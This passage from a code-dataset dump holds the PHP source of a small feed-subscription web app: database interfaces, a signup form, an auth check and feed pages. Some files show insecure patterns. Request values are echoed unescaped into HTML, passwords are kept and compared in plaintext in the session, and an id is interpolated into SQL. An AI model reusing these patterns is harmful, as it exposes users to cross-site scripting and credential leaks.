*/\n //throw new Exception();\n }\n\n $feed->delete();\n } catch(Exception $e) {\n if (isset($feed)) {\n\t$db->pdo->exec(\"DELETE FROM feed_stories WHERE sid={$feed->sid};\");\n\t$feed->delete();\n }\n throw $e;\n } \n }\n}\n\nrequire_once('db_init.php');\nMySQLTest::testStories();\necho 'all tests passed!';\n" }, { "alpha_fraction": 0.7054794430732727, "alphanum_fraction": 0.7095890641212463, "avg_line_length": 25.071428298950195, "blob_id": "4fd0c19cdbcb40c4c1d15c7cc709b82f3547607f", "content_id": "f34ad7d1303c40e49c65e5b7905f39259dc6336c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 730, "license_type": "no_license", "max_line_length": 49, "num_lines": 28, "path": "/www/trunk/db_init.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\nrequire_once('db_mysql_users.php');\nrequire_once('db_mysql_feeds.php');\nrequire_once('db_mysql_stories.php');\n\n/*\n$db_file = 'test/watercooler.db';\n$db_sql = 'SQLiteDB.sql';\n$sqlite3_prog = 'sqlite3';\n\nif (!file_exists($db_file))\n exec(\"$sqlite3_prog -init $db_sql $db_file\");\n*/\n\n$db = MySQLDB::connectFromIni('db_def_cfg.ini');\nif (!($db instanceof MySQLDB))\n throw new Exception('MySQLDB::connect failed');\n$db->setAsSiteDefault();\n\nclass Stories extends MySQLStories {}\nclass Story extends MySQLStory {}\nclass Feed extends MySQLFeed {}\nclass Feeds extends MySQLFeeds {}\nclass User extends MySQLUser {}\nclass Users extends MySQLUsers {}\nclass DB extends MySQLDB {}\n" }, { "alpha_fraction": 0.6146953701972961, "alphanum_fraction": 0.6146953701972961, "avg_line_length": 28.36842155456543, "blob_id": "c49b5f7b5f82629b35155062b9b0bb45f7320922", "content_id": "62496590f33987d1447beeb32bcd8623940834e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 558, "license_type": "no_license", "max_line_length": 70, "num_lines": 19, "path": "/www/trunk/auth.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_init.php');\n\nsession_start();\n\n// XXX replace password for authentication with session id \nif (isset($_SESSION['uid']) && isset($_SESSION['password'])) {\n // find user in database\n $user = User::find('uid', $_SESSION['uid']);\n /* end session if username does not exist or password does not match\n or user is not confirmed by email */\n if ($user === NULL\n || $_SESSION['password'] != $user->password\n || !$user->email_confirmed) {\n unset($_SESSION['uid']);\n unset($_SESSION['password']);\n unset($user);\n }\n}\n" }, { "alpha_fraction": 0.7228915691375732, "alphanum_fraction": 0.7228915691375732, "avg_line_length": 20, "blob_id": "a0cbc66fd121fa2f523c074fdf07e301f7170f62", "content_id": "7ead65861878c576c95275d76da131b7a5122654", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 83, "license_type": "no_license", "max_line_length": 30, "num_lines": 4, "path": "/www/trunk/db_sqlite_test.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_sqlite.php');\nSQLiteTest::testAll();\necho 'tests succeeded';" }, { "alpha_fraction": 0.7191066145896912, "alphanum_fraction": 0.72062087059021, "avg_line_length": 41.90255355834961, "blob_id": "447d7a3c0125fcd851642935cd31ee65c2b9afbe", "content_id": 
"ac1d23494dad02828e4e36821ce84b87bc7e8d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 18491, "license_type": "no_license", "max_line_length": 79, "num_lines": 431, "path": "/www/trunk/db.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n/* interface iDatabase includes all operations that directly involve the\n underlying database. Most higher level operations involving objects in the\n database should be in their other respective interfaces.\n*/\ninterface iDatabase {\n/* function iDatabase::connect connects to a database using the specified\n configuration variables\n\n $cfg_vars: (array) the configuration variables for the connection to make, \n encoded in key-value pairs which are to be defined by the \n\t implementation (see corresponding documentation)\n\n returns an iDatabase implementing object connected to the specified database\n*/\n public static function connect(array $cfg_vars);\n/* function iDatabase::connectFromIni connects to a database using \n configuration variables read from the specified ini file\n\n $cfg_vars: (string) the filename of an ini file which contains the\n configuration variables for the connection to make, encoded in\n\t ini sections and variables which are to be defined by the\n\t implementation (see corresponding documentation)\n\n returns an iDatabase implementing object connected to the specified database\n*/\n public static function connectFromIni($cfg_file);\n\n/* iDatabase::setAsSiteDefault sets the site default database to the current\n database object. This site default is used in other database object classes\n as the default database to access (see corresponding documentation).\n*/\n public function setAsSiteDefault();\n}\n\n/* interface iStories represents a group of feed stories, and handles all\n operations involving multiple feed stories\n*/\ninterface iStories extends Iterator {\n/* function iStory::get gets the feed storys' information from the database\n\n $storyattrs: (array) an array of strings specifying the desired feed story\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'fid': (integer) the feed storys' id numbers\n\t\t 'id': (integer) an alias for 'fid' attribute\n\t 'title': (string) the feed storys' titles\n\t\t 'content': (string) the feed storys' contents\n\t\t 'url': (string) the feed storys' urls\n\t\t 'timestamp': (integer) the feed storys' timestamps, in seconds\n\t\t since 1970-01-01 00:00:00 UTC\n\t\t 'feed': (iFeed) the feed story's source feeds\n\t\t 'category': (string) the feed storys' categories\n $sortattr: (string) the name of an attribute to sort by, selected from the\n list of possible attributes for MySQLStories::sort (see \n\t corresponding documentation)\n $sortreverse: (boolean) TRUE if the sort should be done in reverse of the\n default direction. See documentation for MySQLStories::sort\n\t\t for default sorting directions for different attributes.\n\n returns an array of arrays, each representing information for a single \n story and containing all requested feed story information that could be\n successfully fetched, in the form described in the description of the\n $storyattrs parameter. 
\n/* interface iStories represents a group of feed stories, and handles all\n operations involving multiple feed stories\n*/\ninterface iStories extends Iterator {\n/* function iStories::get gets the feed stories' information from the database\n\n $storyattrs: (array) an array of strings specifying the desired feed story\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'fid': (integer) the feed stories' id numbers\n\t\t 'id': (integer) an alias for 'fid' attribute\n\t 'title': (string) the feed stories' titles\n\t\t 'content': (string) the feed stories' contents\n\t\t 'url': (string) the feed stories' urls\n\t\t 'timestamp': (integer) the feed stories' timestamps, in seconds\n\t\t since 1970-01-01 00:00:00 UTC\n\t\t 'feed': (iFeed) the feed stories' source feeds\n\t\t 'category': (string) the feed stories' categories\n $sortattr: (string) the name of an attribute to sort by, selected from the\n list of possible attributes for iStories::sort (see \n\t corresponding documentation)\n $sortreverse: (boolean) TRUE if the sort should be done in reverse of the\n default direction. See documentation for iStories::sort\n\t\t for default sorting directions for different attributes.\n\n returns an array of arrays, each representing information for a single \n story and containing all requested feed story information that could be\n successfully fetched, in the form described in the description of the\n $storyattrs parameter. The results are sorted by the column and\n direction specified by the $sortattr and $sortreverse parameters if they\n are specified.\n*/\n public function get(array $storyattrs, $sortattr = NULL, \n\t\t $sortreverse = FALSE);\n\n/* function iStories::sort changes the default sorting order and direction\n of the iStories object\n\n $storyattr: (string) the name of the story attribute to sort by, selected\n from the following list of attributes with their default sorting\n\t orders\n\t 'fid': (asc) the feed stories' id numbers\n\t\t 'id': (asc) an alias for 'fid' attribute\n\t 'title': (asc) the feed stories' titles\n\t\t 'content': (asc) the feed stories' contents\n\t\t 'url': (asc) the feed stories' urls\n\t\t 'timestamp': (desc) the feed stories' timestamps\n $reverse: (boolean) TRUE if the sorting direction should be reversed\n*/\n public function sort($storyattr, $reverse = FALSE);\n}\n\n/* interface iStory handles all operations involving a single feed story\n*/\ninterface iStory {\n/* function iStory::find finds a feed story by any attribute guaranteed to be\n unique for each feed story\n\n $attr: (string) an attribute name, selected from the following attribute-\n value pairs\n\t 'fid': (integer) the feed story's id number\n\t 'id': (integer) an alias for 'fid' attribute\n $value: (mixed) the value associated with the attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iStory object representing the matched feed story, or NULL if\n none was found\n*/\n public static function find($attr, $value, iDatabase $db = NULL);\n\n/* function iStory::get gets the feed story's information from the database\n\n $storyattrs: (array) an array of strings specifying the desired feed story\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'fid': (integer) the feed story's id number\n\t\t 'id': (integer) an alias for 'fid' attribute\n\t 'title': (string) the feed story's title\n\t\t 'content': (string) the feed story's content\n\t\t 'url': (string) the feed story's url\n\t\t 'timestamp': (integer) the feed story's timestamp, in seconds\n\t\t since 1970-01-01 00:00:00 UTC\n\t\t 'feed': (iFeed) the feed story's source feed\n\t\t 'category': (string) the feed story's category\n\n returns an array containing all requested feed story information that could\n be successfully fetched, in the form described in the description of the\n $storyattrs parameter\n*/\n public function get(array $storyattrs);\n}\n
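\n/* A minimal usage sketch (illustrative only; it assumes a concrete binding\n such as the Story class created in db_init.php, and the id value 42 is\n hypothetical):\n\n $story = Story::find('id', 42);\n if ($story !== NULL) {\n $info = $story->get(array('title', 'url', 'timestamp'));\n echo $info['title'];\n }\n*/\n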
\n/* interface iFeeds represents a group of feed sources, and handles all\n operations involving multiple feed sources\n*/\ninterface iFeeds extends Iterator {\n/* function iFeeds::create registers multiple feeds in the database using \n information from $feedinfos or updates their information if they already\n exist\n\n $feedinfos: (array) initial feed information to set, encoded in an array of\n arrays with key-value pairs as described for the $feedinfo\n\t parameter in iFeed::set\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeeds object representing the registered or updated feeds\n*/\n public static function create(array $feedinfos, iDatabase $db = NULL);\n\n/* function iFeeds::searchPartial searches for feeds in the database matching\n the given feed information\n\n $attr: (string) the feed attribute to use in the search, selected from the\n following list\n\t 'name': (string) part of the feeds' names\n\t \t 'url': (string) part of the feeds' urls\n $partial_value: (string) the partial value to match against the selected\n attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeeds object representing the matched feeds\n*/\n public static function searchPartial($attr, $partial_value,\n\t\t\t\t iDatabase $db = NULL);\n\n/* function iFeeds::merge merges this iFeeds object with another, creating a\n new iFeeds object that represents all feeds in both groups\n\n $feeds: (object) the iFeeds implementing object to merge with. Note that the\n two objects to merge must be instances of the same class and objects\n\t from the same database\n\n returns an iFeeds implementing object representing all feeds in both groups\n*/\n public function merge(iFeeds $feeds);\n\n/* function iFeeds::sortByPopularity changes the sorted order of the feeds\n returned by any method in this class. Note that calling this method resets\n the Iterator implemented by this class. */\n public function sortByPopularity();\n}\n\n/* interface iFeed handles all operations involving a single feed source\n*/\ninterface iFeed {\n/* function iFeed::find finds a feed by any attribute guaranteed to be unique\n for each feed\n\n $attr: (string) an attribute name, selected from the following attribute-\n value pairs\n\t 'sid': (integer) the feed's id number\n\t 'id': (integer) an alias for 'sid' attribute\n\t 'name': (string) the feed's name\n\t 'url': (string) the feed's url\n $value: (mixed) the value associated with the attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeed object representing the matched feed, or NULL if none was\n found\n*/\n public static function find($attr, $value, iDatabase $db = NULL);\n
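\n/* Usage sketch (illustrative; the URL is hypothetical). Because iFeed::create\n below finds an existing feed by URL before inserting a new one, a separate\n find call is not required first:\n\n $feed = Feed::create(array('name' => 'Example News',\n 'url' => 'http://example.com/rss'));\n*/\n\n/* function iFeed::create registers a new feed in the database using \n information from $feedinfo, or finds one by URL if it already exists\n\n $feedinfo: (array) initial feed information to set, encoded in key-value\n pairs as described for the $feedinfo parameter in iFeed::set\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. 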
Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iFeed object representing the newly created/found feed\n*/\n public static function create(array $feedinfo, iDatabase $db = NULL);\n\n/* function iFeed::get gets the feed's information from the database\n\n $feedattrs: (array) an array of strings specifying the desired feed\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'sid': (integer) the feed's id number\n\t\t 'id': (integer) an alias for 'sid' attribute\n\t 'name': (string) the feed's name\n\t\t 'url': (string) the feed's url\n\t\t 'stories': (iStories) an object representing the feed's \n\t\t stories in the database\n\n returns an array containing all requested feed information that could be\n successfully fetched, in the form described in the description of the\n $feedattrs parameter\n*/\n public function get(array $feedattrs);\n\n/* function iFeed::delete deletes the feed and all information associated with\n the feed in the database. Do not use an iFeed object after deleting it.\n*/\n public function delete();\n\n/* function iFeed::getUserCount calculates the number of users subscribed to\n the feed.\n\n returns an integer representing the number of users\n*/\n public function getUserCount();\n}\n\n/* interface iUsers represents a group of users, and handles all database\n operations directly involving multiple users\n*/\ninterface iUsers {\n/* function iUsers::searchAll searches for users in the database matching ALL\n the given user information\n\n $userinfo: (array) the user information to use in the search, encoded in\n the following key-value pairs\n\t 'uid': (integer) the user's id number\n\t\t 'id': (integer) an alias for 'uid' attribute\n\t 'username': (string) the user's username\n\t \t 'email': (string) the user's email\n\t\t 'phone_number': (string) the user's cell phone number\n\t\t 'carrier': (string) the user's cell phone carrier\n\t\t 'send_email': (boolean) TRUE if the user selected email\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t 'feeds': (iFeeds) an object representing the user's \n\t\t subscribed feeds\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. 
Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUsers object representing the matched users\n*/\n public static function searchAll(array $userinfo, iDatabase $db = NULL);\n\n/* function iUsers::searchAny searches for users in the database matching ANY\n of the given user information\n\n $userinfo: (array) the user information to use in the search, encoded in\n the following key-value pairs\n\t 'uid': (array of integers) the users' id numbers\n\t\t 'id': (array of integers) an alias for 'uid' attribute\n\t 'username': (array of strings) the users' usernames\n\t \t 'email': (array of strings) the users' emails\n\t\t 'phone_number': (array of strings) the users' cell phone\n\t\t numbers\n\t\t 'carrier': (array of strings) the users' cell phone carriers\n\t\t 'send_email': (boolean) TRUE if the user selected email\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t 'feeds': (iFeeds) an object representing the users' \n\t\t subscribed feeds\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUsers object representing the matched users\n*/\n public static function searchAny(array $userinfo, iDatabase $db = NULL);\n\n/* function iUsers::merge merges this iUsers object with another, creating a\n new iUsers object that represents all users in both groups\n\n $users: (object) the iUsers implementing object to merge with. Note that the\n two objects to merge must be instances of the same class and objects\n\t from the same database\n\n returns an iUsers implementing object representing all users in both groups\n*/\n public function merge(iUsers $users);\n}\n
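\n/* Usage sketch (illustrative; the concrete Users class comes from db_init.php\n and the search values are hypothetical):\n\n $a = Users::searchAny(array('username' => array('alice', 'bob')));\n $b = Users::searchAll(array('send_email' => TRUE));\n $all = $a->merge($b); // both operands must come from the same database\n*/\n\n/* interface iUser handles all database operations involving a single user\n*/\ninterface iUser {\n/* function iUser::find finds a user by any attribute guaranteed to be unique\n for each user\n\n $attr: (string) an attribute name, selected from the following attribute-\n value pairs\n\t 'uid': (integer) the user's id number\n\t 'id': (integer) an alias for 'uid' attribute\n 'username': (string) the user's username\n\t 'email': (string) the user's email\n\t 'phone_number': (string) the user's phone number\n $value: (mixed) the value associated with the attribute\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. 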
Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUser object representing the matched user, or NULL if none was\n found\n*/\n public static function find($attr, $value, iDatabase $db = NULL);\n\n/* function iUser::set sets the user's information in the database\n\n $userinfo: (array) the user information to set, encoded in the following \n key-value pairs\n\t 'username': (string) the desired username\n\t\t'password': (string) the desired password, in plaintext or as a\n\t\t hash\n\t\t'email': (string) the user's email\n\t\t'phone_number': (string) the user's cell phone number, with\n\t\t no spaces or dashes, optionally with a '+' as the first\n\t\t character\n\t 'carrier': (string) the user's cell phone carrier\n\t\t'send_email': (boolean) TRUE if the user selected email \n\t\t delivery, FALSE otherwise\n\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t'feeds': (iFeeds) an object representing the user's desired\n\t\t feed subscriptions\n*/\n public function set(array $userinfo);\n\n/* function iUser::addFeed adds a feed to a user's list of subscribed feeds\n\n $feed: (iFeed) the feed to add to the user\n*/\n public function addFeed(iFeed $feed);\n\n/* function iUser::addFeeds adds feeds to a user's list of subscribed feeds\n\n $feeds: (iFeeds) the set of feeds to add to the user\n*/\n public function addFeeds(iFeeds $feeds);\n\n/* function iUser::get gets the user's information from the database\n\n $userattrs: (array) an array of strings specifying the desired user\n attributes to get, selected from the possible keys in the\n\t following list of key-value pairs returned by this function\n\t 'uid': (integer) the user's id number\n\t\t 'id': (integer) an alias for 'uid' attribute\n\t 'username': (string) the user's username\n\t\t 'password': (string) the user's password (or hash of password)\n\t \t 'email': (string) the user's email\n\t\t 'phone_number': (string) the user's cell phone number\n\t\t 'carrier': (string) the user's cell phone carrier\n\t\t 'send_email': (boolean) TRUE if the user selected email\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_text': (boolean) TRUE if the user selected SMS text\n\t\t delivery, FALSE otherwise\n\t\t 'send_sms_link': (boolean) TRUE if the user selected SMS link\n\t\t delivery, FALSE otherwise\n\t\t 'feeds': (iFeeds) an object representing the user's \n\t\t subscribed feeds\n\n returns an array containing all requested user information that could be\n successfully fetched, in the form described in the description of the\n $userattrs parameter\n*/\n public function get(array $userattrs);\n\n/* function iUser::create registers a new user in the database using \n information from $userinfo\n\n $userinfo: (array) initial user information to set, encoded in key-value\n pairs as described for the $userinfo parameter in iUser::set\n $db: (object) an object representing the database to use, or NULL to use\n the database established as the site default. Note that the type of\n\tobject required for this parameter is implementation-specific\n\n returns an iUser object representing the newly created user\n*/\n public static function create(array $userinfo, iDatabase $db = NULL);\n\n/* function iUser::delete deletes the user and all information associated with\n the user in the database. 
Do not use an iUser object after deleting it.\n*/\n public function delete();\n}\n\n/* abstract class DatabaseObject should be the base class for all classes\n representing database objects that need its functionality\n*/\nabstract class DatabaseObject {\n /* $site_db is the site default database, set by\n iDatabase::setAsSiteDefault */\n protected static $site_db;\n}\n" }, { "alpha_fraction": 0.5399060845375061, "alphanum_fraction": 0.5399060845375061, "avg_line_length": 18.363636016845703, "blob_id": "31a113d408ca41924684037e5ba299c79d3a4146", "content_id": "ab1bfff69dc83a6a49b57d27cb36cd97a52bd057", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 213, "license_type": "no_license", "max_line_length": 44, "num_lines": 11, "path": "/www/trunk/addFeed.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_init.php');\nrequire_once('auth.php');\n\n// only act for an authenticated user; auth.php unsets $user otherwise\nif (isset($_REQUEST['id']) && isset($user)) {\n $feed = Feed::find('id', $_REQUEST['id']);\n if($feed !== NULL) {\n $user->addFeed($feed);\n echo $feed->id;\n }\n}\n" }, { "alpha_fraction": 0.5807812213897705, "alphanum_fraction": 0.5884833931922913, "avg_line_length": 33.295597076416016, "blob_id": "0225f575b73a35a346e4beebcf105ecf2da488cd", "content_id": "4cd881ae711990430fecfca145c96835bb26e330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 5453, "license_type": "no_license", "max_line_length": 166, "num_lines": 159, "path": "/www/trunk/signup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n//include database functions and objects\n//include('db.php');\n//include('db_sqlite.php');\nob_start();\ninclude_once('db_init.php');\ninclude_once('common.php');\n\n//start user session\nsession_start();\n\n$fieldNumber = 0;\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Sign up</title>\n <link rel=\"stylesheet\" href=\"watercooler.css\" title=\"signup\" />\n <!-- a script element with a src attribute ignores its inline body, so the\n ready() handler is split into its own element -->\n <script type=\"text/JavaScript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js\"></script>\n <script type=\"text/JavaScript\">\n $(document).ready(function(){$('#userName').focus();});\n </script>\n </head>\n <body>\n <!-- Header -->\n <div id=\"header\">\n <div class=\"corner\">\n\t<a href=\"index.php\">home</a>\n </div>\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n </div>\n </div>\n <fieldset id=\"feedback\">\n <?php include_once('verifySignup.php'); ?>\n </fieldset>\n\n <!-- Form -->\n <form action=\"<?php echo $_SERVER['PHP_SELF'];?>\" method=\"post\">\n\n\n <!-- Personal Information Fieldset -->\n <fieldset><legend>Personal Information</legend>\n\n\t<!-- Username -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"userName\">Username</label>\n\t <input class=\"middleCol\" id=\"userName\" type=\"text\" name=\"userName\" maxlength=\"25\" value=\"<?php echo $displayUserName; ?>\"/>\n\t <script type=\"text/javascript\">\n\t $('#userName').focus();\n </script>\n\t</div>\n\n\t\n\t
class=\"leftCol\" for=\"pass\">Password</label>\n\t <input class=\"middleCol\" id=\"pass\" type=\"password\" name=\"userPassword\" maxlength=\"10\" />\n\t</div>\n\n\t<!-- Repeat Password -->\n\t<div class=\"lineWidth\"><label class=\"leftCol\" for=\"repeatPass\">Repeat Password</label>\n\t <input class=\"middleCol\" id=\"repeatPass\"type=\"password\" name=\"userRepeatPass\" maxlength=\"10\" />\n\t</div>\n\n\t<!-- Email -->\n\t<div class=\"lineWidth\"><label class=\"leftCol\" for=\"email\">Email</label>\n\t <input class=\"middleCol\" id=\"email\" type=\"text\" name=\"userEmail\" maxlength=\"50\"/ value=\"<?php echo $_REQUEST['userEmail']; ?>\"/>\n\t</div>\n\t\n\t<!-- Phone Number -->\n\t<div class=\"lineWidth\"><label class=\"leftCol\" for=\"cell\">Cell Phone #</label>\n\t <input class=\"middleCol\" id=\"cell\" type=\"text\" name=\"userCell\" maxlength=\"10\" value=\"<?php echo $_REQUEST['userCell']; ?>\"/>\n\t</div>\n\n\t<!-- Carrier -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"carrier\">Carrier</label>\n\t <select style=\"float:left; border: 1px solid navy;\" id=\"carrier\" name=\"userCarrier\">\n\t <option value=\"AT&T\">AT&#38;T</option>\n\t <option <?php if($_REQUEST['userCarrier'] == 'Verizon') echo 'selected'; ?> value=\"Verizon\">Verizon</option>\n\t <option <?php if($_REQUEST['userCarrier'] == 'T-Mobile') echo 'selected'; ?> value=\"T-Mobile\">T-Mobile</option>\n\t <option <?php if($_REQUEST['userCarrier'] == 'Sprint') echo 'selected'; ?> value=\"Sprint\">Sprint</option>\n\t </select>\n\t</div>\n </fieldset>\n\n <!-- Feed Information Fieldset -->\n <fieldset><legend>Feed Information</legend>\n\n\t<!-- Methods of Reception -->\n\t<div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"reception\">Methods of Reception</label>\n\t <object>\n\t <input style=\"margin-left:-2.6em;\" type=\"checkbox\" name=\"receive_email\" value=\"yes\" <?php if($_REQUEST['receive_email'] == 'yes') echo 'checked'; ?>/>Email<br />\n\t <input type=\"checkbox\" name=\"receive_sms_text\" value=\"yes\" <?php if($_REQUEST['receive_sms_text'] == 'yes') echo 'checked'; ?>/>SMS (Text)<br />\n\t <input type=\"checkbox\" name=\"receive_sms_link\" value=\"yes\" <?php if($_REQUEST['receive_sms_link'] == 'yes') echo 'checked'; ?>/>SMS (Link)<br />\n\t </object>\n\t</div>\n\t\n\t<!-- Feeds -->\n <div class=\"lineWidth\">\n\t <label for=\"feeds\">Feeds</label>\n\t <object class=\"middleCol\">\n <div id=\"rightCol\">\n\t <?php\n if(isset($_REQUEST['feed']))\n {\n\t foreach($_REQUEST['feed'] as $currentFeed)\n {\n print(\"<input type=\\\"text\\\" name=\\\"feed[]\\\" maxlength=\\\"500\\\" value=\\\"{$currentFeed}\\\"/><br />\");\n }\n }\n else\n {\n for($counter=0; $counter < 3; $counter++)\n print(\"<input type=\\\"text\\\" name=\\\"feed[]\\\" maxlength=\\\"500\\\" /><br />\");\n }\n\t ?>\n </div>\n\t </object>\n\n\t <!--Add More Feeds -->\n\t</div>\n\t<div>\n <button class=\"clickable\" type=\"button\" onclick=\"addFeed()\">Add More Feeds</button>\n\t <input class=\"clickable\" type=\"submit\" name=\"submit\" value=\"Register!\"/>\n\t</div>\n </fieldset>\n </form>\n <script type=\"text/javascript\">\n function addFeed()\n {\n var currentFeeds = document.getElementById('rightCol');\n var newFeeds = document.createElement('input');\n newFeeds.setAttribute('type', 'text');\n newFeeds.setAttribute('name', 'feed[]');\n newFeeds.setAttribute('maxlength', '500');\n currentFeeds.appendChild(newFeeds);\n currentFeeds.appendChild(document.createElement('br'));\n }\n \n function expandFeed()\n {\n var 
url;\n }\n \n </script>\n </body>\n</html>\n" }, { "alpha_fraction": 0.5642787218093872, "alphanum_fraction": 0.5691854953765869, "avg_line_length": 25.128204345703125, "blob_id": "28ec3e9b136d8a3530e44954461973102e21c7b2", "content_id": "0245c70c0aece081a917d9597d5a166d722b00fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1019, "license_type": "no_license", "max_line_length": 102, "num_lines": 39, "path": "/www/trunk/getFeeds.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db_init.php');\nrequire_once('auth.php');\n\nprint('<ul>');\nforeach($user->feeds as $currentFeed)\n {\n // get feed site favicon\n /*$domain = getDomain($currentFeed->url);\n $icon = \"http://\";\n $icon .= $domain;\n $icon .= '/favicon.ico';*/\n // set to default favicon\n $icon = 'feed-icon-14x14.png';\n // the domain is still needed for the icon's alt text below\n $domain = getDomain($currentFeed->url);\n $currentName = $currentFeed->name;\n if(substr($currentFeed->url,0,strlen($currentName)) == $currentName)\n {\n\t$currentName = getDomain($currentFeed->url);\n }\n print(\"<li class=\\\"feed\\\"><button type=\\\"button\\\" onclick=\\\"getStories('{$currentFeed->id}')\\\">\");\n print(\"<img class=\\\"icon\\\" src=\\\"{$icon}\\\" alt=\\\"{$domain}\\\"></img>\");\n print(\"<div class=\\\"feedName\\\">{$currentName}</div></button></li>\");\n }\nprint('</ul>');\n\nfunction getDomain($url)\n{\n // ereg_replace is deprecated; preg_replace is the drop-in replacement here\n $www_stripped = preg_replace('/www\\./','',$url);\n $domain = parse_url($www_stripped);\n if(!empty($domain[\"host\"]))\n {\n return $domain[\"host\"];\n }\n else\n {\n return $domain[\"path\"];\n }\n\n}\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 14.300000190734863, "blob_id": "3463c881edfcab04cd896a3ce436497c18ccab82", "content_id": "57cb6601558ac84684f6f8b28135ad952b952142", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 143, "license_type": "no_license", "max_line_length": 37, "num_lines": 10, "path": "/www/trunk/logout.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\ninclude('common.php');\n\nsession_start();\n\nunset($_SESSION['uid']);\nunset($_SESSION['password']);\n\nheader(\"Location: {$page_uri_base}\");\n" }, { "alpha_fraction": 0.5135135054588318, "alphanum_fraction": 0.5135135054588318, "avg_line_length": 21.846153259277344, "blob_id": "08a1a64025a75993c5366f31f8a1a1210a04a245", "content_id": "03f432ff5f52c8e890b7f07057bcbd1dad6f936a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 296, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/www/trunk/dosignup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nsession_start();\n\nif (isset($_REQUEST['submit'])) {\n var_dump($_REQUEST);\n if ($_REQUEST['username'] != '') {\n $_SESSION['username'] = $_REQUEST['username'];\n print(\"<br />\\n\".$_SESSION['username'].' 
